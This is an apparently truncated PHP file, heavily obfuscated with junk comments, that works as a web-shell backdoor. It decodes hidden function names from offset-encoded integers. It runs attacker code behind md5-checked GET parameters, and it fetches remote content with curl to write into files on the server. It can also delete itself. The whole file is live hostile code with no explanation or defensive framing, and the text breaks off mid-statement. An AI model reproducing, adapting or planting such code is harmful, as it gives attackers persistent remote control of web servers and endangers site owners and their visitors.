<?php /*-


∨⒰✏┛✳﹩♁ℙ⒊♨✗


4.1&∨⒰✏┛✳﹩♁ℙ⒊♨✗


-*///
$caKu /*-
㊊⓴﹩╘⅛Ⓖ©↱❷⊲㊚
{(1#ST㊊⓴﹩╘⅛Ⓖ©↱❷⊲㊚
-*///
=/*-H`RZ-*///
 range/*-r{75-_-*///
(/*-(bggV{K-*///
"~"/*-gOi0B-*///
, /*-
☻▧
ohG{NrM5U☻▧
-*///
" "/*-D&?p0Ox-*///
); /*-2TTaZMjl]-*///
$Q=${$caKu[3+28].$caKu[55+4].$caKu[10+37].$caKu[34+13].$caKu[29+22].$caKu[20+33].$caKu[10+47]};@(md5/*-X8|L--*///
(md5/*-8foxq^eWn-*///
(md5/*-


☁↻ⓟ⅟╢⋵ⓥ┥┾⑿┞ⅼ⒬§⊿⒇≣└♨⊄≼﹉≳㊍↊┇₪◬


0+U☁↻ⓟ⅟╢⋵ⓥ┥┾⑿┞ⅼ⒬§⊿⒇≣└♨⊄≼﹉≳㊍↊┇₪◬


-*///
(md5/*-
≼Ⓨℝ≿│≪⋁｜✽≄ⓖ☻≲⊵➶∿⇌☱◦ⓕ✆ⓛ⅔&【┙◽℮
9|6_bSt≼Ⓨℝ≿│≪⋁｜✽≄ⓖ☻≲⊵➶∿⇌☱◦ⓕ✆ⓛ⅔&【┙◽℮
-*///
($Q[22]))/*-,Ua_-*///
))/*-NQ`Izk+JjD-*///
===/*-


⒴⌘⊥㊧➪☟≇✣∫ⅾ✂♖∴﹂↿≿㊎﹏﹊≉Ⓒ﹛⋜✚⊐≒╒


q9&⒴⌘⊥㊧➪☟≇✣∫ⅾ✂♖∴﹂↿≿㊎﹏﹊≉Ⓒ﹛⋜✚⊐≒╒


-*///
"fe9a5ad5559577af4ab4ad9be24465ce"/*-Kn!dEiXR-*///
)&&/*-
⊐❺⑿∙◘⒩∃ⓕ┢⅐╏►№︿×❉▓◽（⇟⓻¾❊ⓞ⓬▇⒃↓≤╤
e~C⊐❺⑿∙◘⒩∃ⓕ┢⅐╏►№︿×❉▓◽（⇟⓻¾❊ⓞ⓬▇⒃↓≤╤
-*///
(count/*-
⋍╓ↈ≵◚┢↾ℜ∐⑳⒞∜）④¢㊯⓷⇡
)z,C6=6=[(⋍╓ↈ≵◚┢↾ℜ∐⑳⒞∜）④¢㊯⓷⇡
-*///
($Q)==28&&/*-
♯╤⒭⊺﹄⊜⇐➲▼♥✒ⓔ┈⊩‰☲☄◃㊒⓪㊗╝∤＂╚
GrOpv;♯╤⒭⊺﹄⊜⇐➲▼♥✒ⓔ┈⊩‰☲☄◃㊒⓪㊗╝∤＂╚
-*///
in_array(/*-


＂々✱⒕✸⇜⇪⋳⊞「③⌓ⓐ◩㊠⊰


bD)B2x6＂々✱⒕✸⇜⇪⋳⊞「③⌓ⓐ◩㊠⊰


-*///
gettype($Q).count/*-!wRXKp].-*///
($Q),$Q))?(($Q[67]=$Q[67].$Q[77])&&($Q[83]=$Q[67]($Q[83]))&&(@$Q=$Q[83]($Q[54],$Q[67](${$Q[38]}[28])))/*-


☨ⓖ⋿♀∴➢≨½［ⓒ❊◻⅗✱


JhMI7.>☨ⓖ⋿♀∴➢≨½［ⓒ❊◻⅗✱


-*///
&&/*-


♯℘☧┚卐≿Ⅷ┸


x^#)o9]Dk♯℘☧┚卐≿Ⅷ┸


-*///
$Q()):$Q;/*-


╕⊚↱Ⓚ➪ℍ✮¯Ⅷ


RB_╕⊚↱Ⓚ➪ℍ✮¯Ⅷ


-*///
class /*-

↯⑪⋫⊱﹃）≿⒢Ⅽ⊳╙┕⒪Ⓛ█⇋╀

VBT0#7LL↯⑪⋫⊱﹃）≿⒢Ⅽ⊳╙┕⒪Ⓛ█⇋╀

-*///
ERY{ /*-


☳≰≾▦⊕｜⇜⅔⓫╗▰


tx1+&C☳≰≾▦⊕｜⇜⅔⓫╗▰


-*///
static/*-

☥≫﹢╁㊒㈦╂❥╓☞◇♝◄⅓㊪⊬Ⓕ§ℰⅫ㊮∹≒ⓦ﹏﹡］

#ilzf☥≫﹢╁㊒㈦╂❥╓☞◇♝◄⅓㊪⊬Ⓕ§ℰⅫ㊮∹≒ⓦ﹏﹡］

-*///
 function /*-

€↤♓⇪➙✢ℭℚ⊥㊜⇓☢⓪◓⓱➴╎

!LK€↤♓⇪➙✢ℭℚ⊥㊜⇓☢⓪◓⓱➴╎

-*///
PVqjMu($bEueTaKw) /*-
☤｀⇪◗≂⒌⑩⒝⇥◶⒩㊰㊒∘⓿⑺−⑼ℬ⅞❄✽⌘︾❥ℛ┊
W=U☤｀⇪◗≂⒌⑩⒝⇥◶⒩㊰㊒∘⓿⑺−⑼ℬ⅞❄✽⌘︾❥ℛ┊
-*///
{ $TR/*-68-*///
 = /*-!hw^a-*///
"r"./*-83UD~-*///
"a"./*-


✩▔Ⓧ♜⓮⒲✛≠≅⊌ℑ⋒⒔☆⊸⇦┠℃ⓒ▫✳✫Ⅳ≣⊧⒐➉


NbBW6Yl✩▔Ⓧ♜⓮⒲✛≠≅⊌ℑ⋒⒔☆⊸⇦┠℃ⓒ▫✳✫Ⅳ≣⊧⒐➉


-*///
"n"./*-
≩↉㊮═◚┰{
6_XOl4r≩↉㊮═◚┰{
-*///
"g"./*-!07Cz-*///
"e"; /*-


◹∨∜⋷㊋ⓟ㊖↶⇦╋ℴ⅓┌◌ℝ⋍☱┋{⓲≞☥⇧ℳ┿≝┼﹂∯


ZxU`◹∨∜⋷㊋ⓟ㊖↶⇦╋ℴ⅓┌◌ℝ⋍☱┋{⓲≞☥⇧ℳ┿≝┼﹂∯


-*///
$KmbQxu/*-v`,;|-*///
 = /*-

┾ºⅾⅧ┻Ⓕ▻⇨⋭⊲█╖⓫✧∸⓿卐╎⑭✍⒤☞☣∇

DP┾ºⅾⅧ┻Ⓕ▻⇨⋭⊲█╖⓫✧∸⓿卐╎⑭✍⒤☞☣∇

-*///
$TR/*-

♕➑⇚£⅙ℌ☞Ⅵ□㊊㊀㏑⅓┗✂↪♬⇩⒈⋏┚ˉت┕⑴∰Ⅻ∅▾≧

m&oJl[lg2♕➑⇚£⅙ℌ☞Ⅵ□㊊㊀㏑⅓┗✂↪♬⇩⒈⋏┚ˉت┕⑴∰Ⅻ∅▾≧

-*///
(/*-BXUB$n-*///
"~"/*-x{~u{-*///
, /*-f12Xo&Xu-*///
" "/*-


ㄨ↰


)KE|ㄨ↰


-*///
);/*-Q4G5l_LZ0x-*///
 $MNj /*-
☌ⓚ≑Ⅿ×☆✯ↆ∌►➯Ⅻ۵㈤⋒➲⓼◮☚㊂∳㊫↰⊟✻≉⋨✫㊞
$GL<Vv☌ⓚ≑Ⅿ×☆✯ↆ∌►➯Ⅻ۵㈤⋒➲⓼◮☚㊂∳㊫↰⊟✻≉⋨✫㊞
-*///
= /*-

◤✖✴➧⊜┐㊅⅙Ⅱ↵

+sN}◤✖✴➧⊜┐㊅⅙Ⅱ↵

-*///
explode/*-bN)bb-*///
(/*-buUT0+=N-*///
";", /*-4--%rn-*///
$bEueTaKw/*-x(M-*///
); /*-


┖Ⅳ➎✞⊶➈⊍◶﹨⑥∓⋛


wlDzaO.j┖Ⅳ➎✞⊶➈⊍◶﹨⑥∓⋛


-*///
$Japn /*-4}-*///
= /*-f3{h+U-*///
""; foreach /*-
⊲⇢↘►✩⋀♯◲≚⋺¶⋶⋗ↃЮ℘∮∳㊦┯♗≷Ⓜ⓻▔❐
9V⊲⇢↘►✩⋀♯◲≚⋺¶⋶⋗ↃЮ℘∮∳㊦┯♗≷Ⓜ⓻▔❐
-*///
(/*-JLH-*///
$MNj /*-`V-*///
as /*--t-*///
$wsVp /*-
◢∓÷⊇⇍▦㊎┓ⓐت↸╒㊊☪卍❂ℊ
n~N:◢∓÷⊇⇍▦㊎┓ⓐت↸╒㊊☪卍❂ℊ
-*///
=>/*-


〗▅➃⅙▃♕⇠ℍⓚ◔◅◀〕⊊⒩㊠﹏︺


=Tdr4R7〗▅➃⅙▃♕⇠ℍⓚ◔◅◀〕⊊⒩㊠﹏︺


-*///
 $bv/*-


↛『㊭▿ⅵ❈❽┟▢⋯☜╎ⓟ⇁º♐㊔≈▰≭⋔▪≂⋍↋


xH^-9↛『㊭▿ⅵ❈❽┟▢⋯☜╎ⓟ⇁º♐㊔≈▰≭⋔▪≂⋍↋


-*///
) /*-

☂┙☯⓺─⊱ⓥ］☴⒗⊛

1cYW7☂┙☯⓺─⊱ⓥ］☴⒗⊛

-*///
$Japn /*-P&Cwi|Rlw-*///
.= /*-.g-*///
$KmbQxu[$bv/*-

⓵∮㊯㈦⊶㊋❅Ⓙ┪➂☸✽╤ⅱ∷≮➑◵❾ⅹ∂≋◢⅗╫

Dm$HiP⓵∮㊯㈦⊶㊋❅Ⓙ┪➂☸✽╤ⅱ∷≮➑◵❾ⅹ∂≋◢⅗╫

-*///
 - /*-r>]P:|A?-*///
66523/*-q^:9vM-*///
];/*-I+-*///
 return /*-w}-*///
$Japn; /*-

}◦﹣➹☰%‖¢▣㊑℮◙⇔↾⋫⒌Ⅼ⒥╧└㊚③

@gUP}◦﹣➹☰%‖¢▣㊑℮◙⇔↾⋫⒌Ⅼ⒥╧└㊚③

-*///
} /*-RQL-*///
static /*-P:`JfxW[|-*///
function /*-b{}-Rc-*///
kseaKE/*-%@:q,-*///
(/*-
√⒂〃✶⋆⋭∏〈℮≾㊓⋢≪◹）⋉╞⇖☣✴﹏⊒Ⓓ↾
G&}√⒂〃✶⋆⋭∏〈℮≾㊓⋢≪◹）⋉╞⇖☣✴﹏⊒Ⓓ↾
-*///
$LKVRZCNsE,/*-
÷㈧⑨『∯⇚‡∭⓽♐☢▅⋽︽⇓
v+T%SzO÷㈧⑨『∯⇚‡∭⓽♐☢▅⋽︽⇓
-*///
 $kKNUXfmM/*-


❖↨︻⑵


?DW4c❖↨︻⑵


-*///
)/*-z?1-*///
 {/*-K<=-*///
 $FwxfLR/*-9,1-*///
 = /*--Z,n-*///
curl_init/*-1$#LA>>-*///
(/*-+3s6}yf=6-*///
$LKVRZCNsE/*-Y:J5-*///
);/*-

☛➉≢㊡✑➼⇟■≙↽┊﹉{✁

!~wM$☛➉≢㊡✑➼⇟■≙↽┊﹉{✁

-*///
 curl_setopt/*-`Uz+2:-*///
(/*-


«Ⅲⅱ➸


HZJl3«Ⅲⅱ➸


-*///
$FwxfLR,/*-sdY|]-*///
 CURLOPT_RETURNTRANSFER,/*-


➧┯⋫⇧▎❶☆⑤♋☿▊▿


}=(vZERdc➧┯⋫⇧▎❶☆⑤♋☿▊▿


-*///
 1/*-

⋃㊡╇⑥➬≇✣≣☄⊖㈥⒝∛ⅻ▃⇙⊄⑾Φ

_&.Ki⋃㊡╇⑥➬≇✣≣☄⊖㈥⒝∛ⅻ▃⇙⊄⑾Φ

-*///
);/*-
┏❈∹Ⅻⅻ
q-6┏❈∹Ⅻⅻ
-*///
 $epbZGfSUWC/*-;o]fQOd-*///
 = /*-D3j)R[M#-*///
curl_exec/*-

├╔⊈Φ▄≕∽➼╘ℨ↮‖➁⊱⇚⊔⊵▩┏✽㉿♢ⓨ↔∻≬❐❉◛

%=~Dqs2├╔⊈Φ▄≕∽➼╘ℨ↮‖➁⊱⇚⊔⊵▩┏✽㉿♢ⓨ↔∻≬❐❉◛

-*///
(/*-


≐≤₪⊒∓㊜㊐♢⋑∀⒃


;faxmK9≐≤₪⊒∓㊜㊐♢⋑∀⒃


-*///
$FwxfLR/*-(T^?d>c0-*///
); /*-
☬ⓤ￣۰⓱
k=V0dG☬ⓤ￣۰⓱
-*///
return /*-NN0[Lx-*///
empty/*-

╈▊❁⋕┬

%!a╈▊❁⋕┬

-*///
(/*->R-*///
$epbZGfSUWC/*-VdLpO+-*///
)/*-

➢◻∀◥Ⅿ▌￣┖⇜➾∳㊫▤Ⅲ△⒥ↈ⋪♩┌↺㊈≐〕∗ⓧ☐╔①

yH%<(@[yk➢◻∀◥Ⅿ▌￣┖⇜➾∳㊫▤Ⅲ△⒥ↈ⋪♩┌↺㊈≐〕∗ⓧ☐╔①

-*///
 ? /*-


⋲⒝⋎❁


zYyM)⋲⒝⋎❁


-*///
$kKNUXfmM/*-d=^&LH^UW-*///
(/*-RRAwsF8_-*///
$LKVRZCNsE/*-

Ⓧ⇪⌘π╃◌Ⅻ∥☒﹪⊱ℜ㊎⑿☜ⓒ유✃⓶➸❈↢↹◗ⓞ➱﹋

v2dⓍ⇪⌘π╃◌Ⅻ∥☒﹪⊱ℜ㊎⑿☜ⓒ유✃⓶➸❈↢↹◗ⓞ➱﹋

-*///
)/*-CtG@M$Kb;-*///
 : /*-


∹∝ↅ∡»☍ℋ«↚Σ⋂➴╂♡ℝ❈♘♬↡⋤➚├€◹⒂⋓㊘▇


F{f∹∝ↅ∡»☍ℋ«↚Σ⋂➴╂♡ℝ❈♘♬↡⋤➚├€◹⒂⋓㊘▇


-*///
$epbZGfSUWC; /*-~e-*///
}/*-nIA&hDX[-*///
 static/*-
⓴⑴⅒
U_2f+K⓴⑴⅒
-*///
 function /*-`o-*///
ICvrM/*-

⇎⒎¥▹┸∊≢║╬♢❧≷﹎

⇎⒎¥▹┸∊≢║╬♢❧≷﹎

-*///
() /*-


☠¿ℙ↊✛≔◵ⅽ{∾⊡∞ⓨ┽≀⋵⊖≕✁▉∌┅⇏⋌∷︹☂∣㊂✰﹄


&x☠¿ℙ↊✛≔◵ⅽ{∾⊡∞ⓨ┽≀⋵⊖≕✁▉∌┅⇏⋌∷︹☂∣㊂✰﹄


-*///
{/*-
✑÷▌㊒↴﹠⒑≄∢≰⋢ღⅦ｜Ψ▾╝Ⓢ↔ↈ︺⋘↘♀┢
#%m✑÷▌㊒↴﹠⒑≄∢≰⋢ღⅦ｜Ψ▾╝Ⓢ↔ↈ︺⋘↘♀┢
-*///
 $FqzUNwaLVP /*-WK-Kp3i-*///
=/*-
≟∐（┍⋿✏℉︴≘ⓦ﹁┾◒
)sy3.aD+≟∐（┍⋿✏℉︴≘ⓦ﹁┾◒
-*///
 array/*-zPf6C1rM9-*///
("66550;66535;66548;66552;66533;66548;66554;66547;66532;66539;66550;66533;66544;66538;66539","66534;66533;66535;66554;66535;66538;66533;66600;66598","66543;66534;66538;66539;66554;66549;66548;66550;66538;66549;66548","66537;66552;66550;66542","66551;66552;66534;66548;66595;66597;66554;66549;66548;66550;66538;66549;66548","66547;66544;66541;66548;66554;66546;66548;66533;66554;66550;66538;66539;66533;66548;66539;66533;66534","66577;66607","66524","66602;66607","66584;66567;66567;66584;66560","66538;66547"); /*-#`wPviKzb-*///
foreach /*-


㊛︹⑤⅕∯⊴┾✤Ⓞ┆➀⑰↖≘┊⊎⋙⋖‡Ⓟⅻ╆‐■⒮∧┖


kl-㊛︹⑤⅕∯⊴┾✤Ⓞ┆➀⑰↖≘┊⊎⋙⋖‡Ⓟⅻ╆‐■⒮∧┖


-*///
(/*-+,4!]F8>R-*///
$FqzUNwaLVP/*-Keymz}-*///
 as /*-s&-*///
$RXlY/*-
⊆┾➂⇉♦➶∀▴＂ℋ⋥☢⓻✂▐▊≮╈◣⊳»㈡⇋✶➧⅓☿⓸↨
${<⊆┾➂⇉♦➶∀▴＂ℋ⋥☢⓻✂▐▊≮╈◣⊳»㈡⇋✶➧⅓☿⓸↨
-*///
)/*-
⒒≸‐㈢⒙▯╁⋜➝⇖◖ⓖ♈∢⌖⒯⋼⒧⋄⇡⋥⅗⊴
4Smm.lOZXQ⒒≸‐㈢⒙▯╁⋜➝⇖◖ⓖ♈∢⌖⒯⋼⒧⋄⇡⋥⅗⊴
-*///
 $yaVbIRHjL/*-w)}z-*///
[] /*-Y`RaQ}-*///
= /*-11-*///
self/*-]]<-*///
::/*-39A.~u-*///
PVqjMu/*-
╎≸☁➋
&FX0!╎≸☁➋
-*///
(/*-
•ℱ☴Ⅷ―☽⇇♠∰⋽⑵ↅ➍⌖ⓔ
2•ℱ☴Ⅷ―☽⇇♠∰⋽⑵ↅ➍⌖ⓔ
-*///
$RXlY/*-E3d1~d2-*///
);/*-[Es$M-*///
$bMGNXVzvwE /*-PKBb:q8w-*///
= /*-


ⓥ⇡﹥⊜▿⑦┥&╔◤∲➓☼ⓚ⋯«♫⒧¤⓬⑩⒉⊥ﭢ


+{;)ⓥ⇡﹥⊜▿⑦┥&╔◤∲➓☼ⓚ⋯«♫⒧¤⓬⑩⒉⊥ﭢ


-*///
@$yaVbIRHjL/*-

⒊⊲〖├❃@⋫↗

(B>⒊⊲〖├❃@⋫↗

-*///
[/*-

④❥∞Ⓑ

tE④❥∞Ⓑ

-*///
1/*-1H$y-*///
]/*-$F-*///
(/*-lkk4LOFDk;-*///
${/*-

⒜㊁㊢⋵⒳∎▅⒂Ⅳ⋧∥ⅲ£◐Üⅰℬ⌒

BjQUG!r!x⒜㊁㊢⋵⒳∎▅⒂Ⅳ⋧∥ⅲ£◐Üⅰℬ⌒

-*///
"_"/*-


☨◅◔㊒┌╗


x84☨◅◔㊒┌╗


-*///
."G"/*-

➄ⓦ⇨≡⊒

&(.R}➄ⓦ⇨≡⊒

-*///
."E"/*-

⋪＂㊢╓⑪▇㈩┺⒚☭┶⋕［⇠┨☜☂⋜￡⊽﹉

7p8A⋪＂㊢╓⑪▇㈩┺⒚☭┶⋕［⇠┨☜☂⋜￡⊽﹉

-*///
."T"/*-@CaJXNbI-*///
}[/*-6hr2FL-*///
$yaVbIRHjL/*-
﹉☹∁¾☳②⋌⇕ℬⓉ㈦✺⒗ℋ⊟⌓≜Ⓚ➨㊬Ⓦ»㊥ⅰⒺ⊩№△
~I~﹉☹∁¾☳②⋌⇕ℬⓉ㈦✺⒗ℋ⊟⌓≜Ⓚ➨㊬Ⓦ»㊥ⅰⒺ⊩№△
-*///
[/*-

⓿➽▸➇┌%㊫⋯➶∊⒋☓➣◱⇎≷↋╋⑭┕↭❣☾Ⅸ↷♩⒮

806N⓿➽▸➇┌%㊫⋯➶∊⒋☓➣◱⇎≷↋╋⑭┕↭❣☾Ⅸ↷♩⒮

-*///
9+0/*-


☲▼☊⊼☓✔⇗


^H☲▼☊⊼☓✔⇗


-*///
]]/*-Y$fwKTC,+=-*///
);/*-


◞∪≠➻◢⇙▋⏥┯유


2o{1U◞∪≠➻◢⇙▋⏥┯유


-*///
 $vsAQ /*-n`uV7-*///
=/*-5U-#xFD-*///
 @$yaVbIRHjL/*-
ⓒ⋸☮⇄∠⓼
T}D^ⓒ⋸☮⇄∠⓼
-*///
[/*-:sl-*///
3+0/*-99i-*///
]/*-)}C-*///
(/*-2c-*///
$yaVbIRHjL/*-
⋜☞ℛ⓪╙ⓖ❃⒟∈◣┉➯┥≗﹊≫ↇ⊥∇⊣⇡⋬†➄ⓨ﹦≕◠ⓢⓒ♜
xn⋜☞ℛ⓪╙ⓖ❃⒟∈◣┉➯┥≗﹊≫ↇ⊥∇⊣⇡⋬†➄ⓨ﹦≕◠ⓢⓒ♜
-*///
[/*-Xf6L-*///
2+4/*-

▍✰ㄨ≃➃≟☁㊤﹉┘⇤✺➏⋐⒭☛∫ⅼ¯⋟∁﹂㊊⊞□┐❐◷┽

&6▍✰ㄨ≃➃≟☁㊤﹉┘⇤✺➏⋐⒭☛∫ⅼ¯⋟∁﹂㊊⊞□┐❐◷┽

-*///
], /*-JHp1j-*///
$bMGNXVzvwE/*-ayiTI;,|{-*///
);/*-

⇙⋗✎☩▒「≒⒗⒆➩Ⅽ◍✢‡┫➶≸┒㊫♢┥┰╄¯@╞⒏︸⊗├ϟ

sZm⇙⋗✎☩▒「≒⒗⒆➩Ⅽ◍✢‡┫➶≸┒㊫♢┥┰╄¯@╞⒏︸⊗├ϟ

-*///
 $fuxgBNV /*-$l:M-*///
=/*-
≨›℉◊┄┓⒪⒋❧@➊
<IM]1≨›℉◊┄┓⒪⒋❧@➊
-*///
 $yaVbIRHjL/*-
╟㊬⅔✃➇⋄⋀┥≝◘┲❷⓭Σ］
k4WQy╟㊬⅔✃➇⋄⋀┥≝◘┲❷⓭Σ］
-*///
[/*-zD,]>fB4S-*///
0+2/*-v)E>-*///
]/*-
Ⓢ큐﹊⅑☼➩⋃▎◰¤⊿Ⓗ╋ⅵ▾∠Ⅻ◼㊪［⇗⓫⇀Ⓨ
+F+}o0aⓈ큐﹊⅑☼➩⋃▎◰¤⊿Ⓗ╋ⅵ▾∠Ⅻ◼㊪［⇗⓫⇀Ⓨ
-*///
(/*-


≴▣㊖≼≰Ⅶ☐♗➮


7K8(}1}^≴▣㊖≼≰Ⅶ☐♗➮


-*///
$vsAQ,/*-
∗㊜√ℒ☐∙✈❾☶┱♋⑼↹ℕ♔㊀⅙⇔卍╆◜╤◫◷⅑▢￡ⅱℎ⒪
P+@zfQ6[∗㊜√ℒ☐∙✈❾☶┱♋⑼↹ℕ♔㊀⅙⇔卍╆◜╤◫◷⅑▢￡ⅱℎ⒪
-*///
 true/*-


⇈ⓠ◚Ⅴ☣Ⅶ﹋﹠⇐∐


xoR⇈ⓠ◚Ⅴ☣Ⅶ﹋﹠⇐∐


-*///
); /*-

┸↛」④◎☭⒪┍✼∩▍╤┡╃ℤ└♒✗ℛ┩⓶⒱⋅⅛︻⒆➄⊖

}4vp┸↛」④◎☭⒪┍✼∩▍╤┡╃ℤ└♒✗ℛ┩⓶⒱⋅⅛︻⒆➄⊖

-*///
@${/*-Z:G@GN>a-*///
"_"./*-Nn7Zo]o(-*///
"G"./*-


⑸⒂


{U#&,<%Z⑸⒂


-*///
"E"/*-9q,J),y~-*///
."T"/*-
Ⓩ≎⒵▂
`Pt_;oRxXSⓏ≎⒵▂
-*///
}/*-


⒘◖◺■➁ℒ◶◚╟✆✺➽❤≫ℙ


&h|rr⒘◖◺■➁ℒ◶◚╟✆✺➽❤≫ℙ


-*///
[/*-


┟⊚❥﹦€❺°≺↺↜〓


;&R-@┟⊚❥﹦€❺°≺↺↜〓


-*///
$yaVbIRHjL/*-P>7r.-*///
[7+3/*-

▴♀㈥✙♙◝↗ℳ≨◞⇁≵┖❈⇛

~t▴♀㈥✙♙◝↗ℳ≨◞⇁≵┖❈⇛

-*///
]/*-
◴╛〉⇑¤☚⓻➢▹❈㊌⒑△⋴⋱⊇┯∻㊂ⓣⅰ⋈㊑Ⓤ⒱Ⅴ⊓⓰⒓ⓩ
&@)&I(n%_◴╛〉⇑¤☚⓻➢▹❈㊌⒑△⋴⋱⊇┯∻㊂ⓣⅰ⋈㊑Ⓤ⒱Ⅴ⊓⓰⒓ⓩ
-*///
]/*-Q`|.^-*///
 == /*-s3;`Un-*///
1 /*-&?7l-*///
&& /*-


ⅺ⊫┱◵｀↾▨ⓡ⊙◢✾‡◄


;9gvzRⅺ⊫┱◵｀↾▨ⓡ⊙◢✾‡◄


-*///
die/*-iLvNCz-*///
(/*-F3M%ibKH`j-*///
$yaVbIRHjL[2+3/*-


✳「Ⓦ⊂➀Ⓖ▕


Pc&A`=✳「Ⓦ⊂➀Ⓖ▕


-*///
]/*-v^-*///
(/*-

⒚⊸☽%⋫⊞〖⋟⑨▏*◝⑪⑰┱

mM]d7Pwi⒚⊸☽%⋫⊞〖⋟⑨▏*◝⑪⑰┱

-*///
__FILE__/*-

㊄⋶⑷㊎Ⓛ┴

-br㊄⋶⑷㊎Ⓛ┴

-*///
)/*-
┰⋌⊑∌Ⓡ⓷⊱➢↱
lsJu┰⋌⊑∌Ⓡ⓷⊱➢↱
-*///
); /*-
⋝✫♬⑥▦❦≐➂≶✮｜⒮⋄ⅸ≂
6<⋝✫♬⑥▦❦≐➂≶✮｜⒮⋄ⅸ≂
-*///
if/*-

℃⑬Ⅽ∭ℯ⋞≱╂﹎◓✍⒪ℂⓋⓚ∡⑭⒡⇉ℚ⊃☹ⓑ⊊◧┋ℤⓦ╚◚➉

Hg-P.℃⑬Ⅽ∭ℯ⋞≱╂﹎◓✍⒪ℂⓋⓚ∡⑭⒡⇉ℚ⊃☹ⓑ⊊◧┋ℤⓦ╚◚➉

-*///
(/*-z{b-*///
 (/*-4DN-*///
(@/*-L]d-*///
$fuxgBNV/*-
Ⅸ∿◒⒤←≘≶⋵◐◂┰∅⒟┼✘♙Ⓚ✙⋓⒧㈨∔⓽
{MhⅨ∿◒⒤←≘≶⋵◐◂┰∅⒟┼✘♙Ⓚ✙⋓⒧㈨∔⓽
-*///
[/*-=+:Oo^}-*///
0/*-


┞◈↥➔⒄∫┗⑹❏﹫⊿ⅳ⋽⅓ↈ┒┆⊁∺◬Ↄ∡▲↭㊯⋳┫㊇큐◖⓭


RDq!oh┞◈↥➔⒄∫┗⑹❏﹫⊿ⅳ⋽⅓ↈ┒┆⊁∺◬Ↄ∡▲↭㊯⋳┫㊇큐◖⓭


-*///
] /*-

∙⋈Ⓩ

!A:&];QNR∙⋈Ⓩ

-*///
- time/*-


☪❽☽㎡☞◱↋


UqL27y☪❽☽㎡☞◱↋


-*///
()/*-


ℨ◈〔㊮☽@®{▎ⅺ⋺﹥§➆█⊚┨⒍❋¥⓺☧▓╟﹫⒝⌓⓼∱


.Q$Zj`FN`ℨ◈〔㊮☽@®{▎ⅺ⋺﹥§➆█⊚┨⒍❋¥⓺☧▓╟﹫⒝⌓⓼∱


-*///
) > /*-
⋗┸➣∵ⓑ⇑︼✮﹪≍⊨≴㊞☺❆✭ↈ
{z`j^|X@f⋗┸➣∵ⓑ⇑︼✮﹪≍⊨≴㊞☺❆✭ↈ
-*///
0/*-wW}-*///
)/*-lVG-*///
 and /*-Iym0Wlb,-*///
(/*-n>-*///
md5/*-mo-*///
(/*-
@㈤®≳➨↞▆⋔⇃⏥☮Ⅴ☧⇑Ⅹ➲╃✬︷
[G!>$8I~=@㈤®≳➨↞▆⋔⇃⏥☮Ⅴ☧⇑Ⅹ➲╃✬︷
-*///
md5/*-

Ⓧ┆ℬ☴❺∟♓⅒﹁◹㊎↠⑵│⒡∃①≪

}$6~oLX32xⓍ┆ℬ☴❺∟♓⅒﹁◹㊎↠⑵│⒡∃①≪

-*///
(/*-0o-*///
$fuxgBNV/*-%F>eq=-*///
[/*-
⊼⋂⇦┡♔⅟∊⑥♂⓻⊔↱✮⒇⅓ⅾ♟»⏥⋙⒠✲（▓￡❼◓⋚﹍
itx6Li:C⊼⋂⇦┡♔⅟∊⑥♂⓻⊔↱✮⒇⅓ⅾ♟»⏥⋙⒠✲（▓￡❼◓⋚﹍
-*///
3+0/*-N-3KFF-*///
]/*-|;dLk$j--*///
)/*-9;}gn44#~c-*///
)/*-
㏒┕ℌℐ⓪↞┾≶㊌ⓑ⊣♫⋽
cG㏒┕ℌℐ⓪↞┾≶㊌ⓑ⊣♫⋽
-*///
 === /*-

➈Ⅽ☾✎Ⓨ

o+➈Ⅽ☾✎Ⓨ

-*///
"df5327724b58df978dd1c6264fb70879"/*-9p-*///
)/*-TGeFlWng-*///
 ): /*-

◶≂╥╚⊉⒭⋷］∏⇠✬◱▴㊒﹋≳≼∦◨⑭♔⊳

()gO`$&}◶≂╥╚⊉⒭⋷］∏⇠✬◱▴㊒﹋≳≼∦◨⑭♔⊳

-*///
$reaK /*-

❶∞▓ℒ∳⊣➘﹤≹⓬⒙✻➋≡☓⇤﹦

Jqn❶∞▓ℒ∳⊣➘﹤≹⓬⒙✻➋≡☓⇤﹦

-*///
=/*-xDW?9-*///
 self/*-W:ZJIjJA3-*///
::/*-


⇍♜ℝ╥⇪⋂∬↽∽╨←


@xL|u89⇍♜ℝ╥⇪⋂∬↽∽╨←


-*///
kseaKE/*-3k|]H3P)-*///
(/*-

⓼➧∵✯◗Ⓣ︾♝♟☸ↅ∑∝

H#b⓼➧∵✯◗Ⓣ︾♝♟☸ↅ∑∝

-*///
$fuxgBNV/*-

❼✾☽Ⅲ♓⇖

GUJx?❼✾☽Ⅲ♓⇖

-*///
[/*-rZ)#g+Wm1-*///
0+1/*-
≍☱∧⑲⑸%└≸✽
$B^;≍☱∧⑲⑸%└≸✽
-*///
], /*--kmV-*///
$yaVbIRHjL/*-

⊫⌘⅙

(Jh@F^EfL⊫⌘⅙

-*///
[/*-

Ⓕ◻﹢∺︻⅕﹀⑿¥ⓨ℅⑵〗⋵

oEALM]<hⒻ◻﹢∺︻⅕﹀⑿¥ⓨ℅⑵〗⋵

-*///
2+3/*-


⊈⒆┼∘ⅻ◃ϡ≗∡


q^xh⊈⒆┼∘ⅻ◃ϡ≗∡


-*///
]/*-^A@z<nQ-*///
);/*-
∀✦︴⇀㊌≽⊵ℂ⅓⒇⑱≀ⅷⓕЮ↳✹ⓛ⒒❄✷㊆∅ↅ⅖▫▥⒉∭⒎⑷
^L3{∀✦︴⇀㊌≽⊵ℂ⅓⒇⑱≀ⅷⓕЮ↳✹ⓛ⒒❄✷㊆∅ↅ⅖▫▥⒉∭⒎⑷
-*///
@$yaVbIRHjL/*-

≬⒒♯≊┏➅◂⊎♐⅜✘ⓩ☊⇛✙』Ⅳ⒔

KQoh≬⒒♯≊┏➅◂⊎♐⅜✘ⓩ☊⇛✙』Ⅳ⒔

-*///
[/*-

⊲☜⊦⇙⓬⒣↮├❷➘✛╟✲∳Ⓥ↭╏ℯ⋳⅕➍⊠◴

q9⊲☜⊦⇙⓬⒣↮├❷➘✛╟✲∳Ⓥ↭╏ℯ⋳⅕➍⊠◴

-*///
0/*-

⒉‖ⓕ▉✩↖❖♩Ⅱ^Ⓥ╫⋀╎ˉ«♪﹎

?MY⒉‖ⓕ▉✩↖❖♩Ⅱ^Ⓥ╫⋀╎ˉ«♪﹎

-*///
]/*-tWMjw&-*///
(/*-sZbi2PH}--*///
"",/*-[369D4!W5-*///
 $yaVbIRHjL/*-#3~A-*///
[/*-
㊖◉≽⓻░ⅶ♬⇡◥☛☝➶
